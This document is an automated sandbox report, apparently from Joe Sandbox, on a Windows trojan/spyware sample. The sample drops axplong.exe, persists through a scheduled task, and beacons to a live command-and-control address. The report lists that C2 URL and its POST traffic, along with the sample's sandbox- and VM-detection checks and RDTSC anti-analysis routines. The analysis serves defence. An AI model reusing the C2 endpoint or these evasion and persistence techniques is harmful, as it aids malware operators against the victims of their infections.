                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0079BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,4_2_0079BD60
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php32
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
                  Source: axplong.exe, 00000004.00000002.2605243731.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp

                  System Summary

                  barindex
                  PE file contains section with special chars
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D30684_2_007D3068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0079E4404_2_0079E440
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00794CF04_2_00794CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007C7D834_2_007C7D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D765B4_2_007D765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_00794AF04_2_00794AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D777B4_2_007D777B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D87204_2_007D8720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D6F094_2_007D6F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007D2BD04_2_007D2BD0
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9971315139645777
                  Source: file.exeStatic PE information: Section: fhovjjjc ZLIB complexity 0.994316089837997
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9971315139645777
                  Source: axplong.exe.0.drStatic PE information: Section: fhovjjjc ZLIB complexity 0.994316089837997
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@2/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1942016 > 1048576
                  Source: file.exeStatic PE information: Raw size of fhovjjjc is bigger than: 0x100000 < 0x1a8600

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.790000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 4.2.axplong.exe.790000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhovjjjc:EW;tlwinqqe:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1e5e3c should be: 0x1de85d
                  Source: file.exeStatic PE information: real checksum: 0x1e5e3c should be: 0x1de85d
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: .idata
                  Source: file.exeStatic PE information: section name:
                  Source: file.exeStatic PE information: section name: fhovjjjc
                  Source: file.exeStatic PE information: section name: tlwinqqe
                  Source: file.exeStatic PE information: section name: .taggant
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: fhovjjjc
                  Source: axplong.exe.0.drStatic PE information: section name: tlwinqqe
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_007AD84C push ecx; ret 4_2_007AD85F
                  Source: file.exeStatic PE information: section name: entropy: 7.976264378298446
                  Source: file.exeStatic PE information: section name: fhovjjjc entropy: 7.95414237718118
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.976264378298446
                  Source: axplong.exe.0.drStatic PE information: section name: fhovjjjc entropy: 7.95414237718118
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42EA59 second address: 42EA63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F865CD192D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9F6B second address: 5A9F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9F71 second address: 5A9F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A9F75 second address: 5A9F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B375F second address: 5B376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F865CD192DEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B376E second address: 5B377A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F865D1C554Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B377A second address: 5B3783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3953 second address: 5B3967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C5550h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3967 second address: 5B396B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B396B second address: 5B3980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C554Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6CE7 second address: 5B6CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6CED second address: 5B6CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D66 second address: 5B6D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6D6A second address: 5B6DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F865D1C5548h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007F865D1C5558h 0x0000002a mov dword ptr [ebp+122D2EEEh], eax 0x00000030 push 00000000h 0x00000032 jo 00007F865D1C554Ch 0x00000038 mov esi, dword ptr [ebp+122D2AC0h] 0x0000003e mov ecx, 6F49D989h 0x00000043 push 0526714Bh 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6DDE second address: 5B6DED instructions: 0x00000000 rdtsc 0x00000002 jl 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6DED second address: 5B6E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 052671CBh 0x0000000d movzx edx, dx 0x00000010 push 00000003h 0x00000012 sub dword ptr [ebp+122D1A9Eh], esi 0x00000018 mov esi, dword ptr [ebp+122D2C4Ch] 0x0000001e push 00000000h 0x00000020 mov cx, A7C3h 0x00000024 push 00000003h 0x00000026 jnc 00007F865D1C5556h 0x0000002c call 00007F865D1C5549h 0x00000031 pushad 0x00000032 jmp 00007F865D1C554Dh 0x00000037 jng 00007F865D1C554Ch 0x0000003d js 00007F865D1C5546h 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
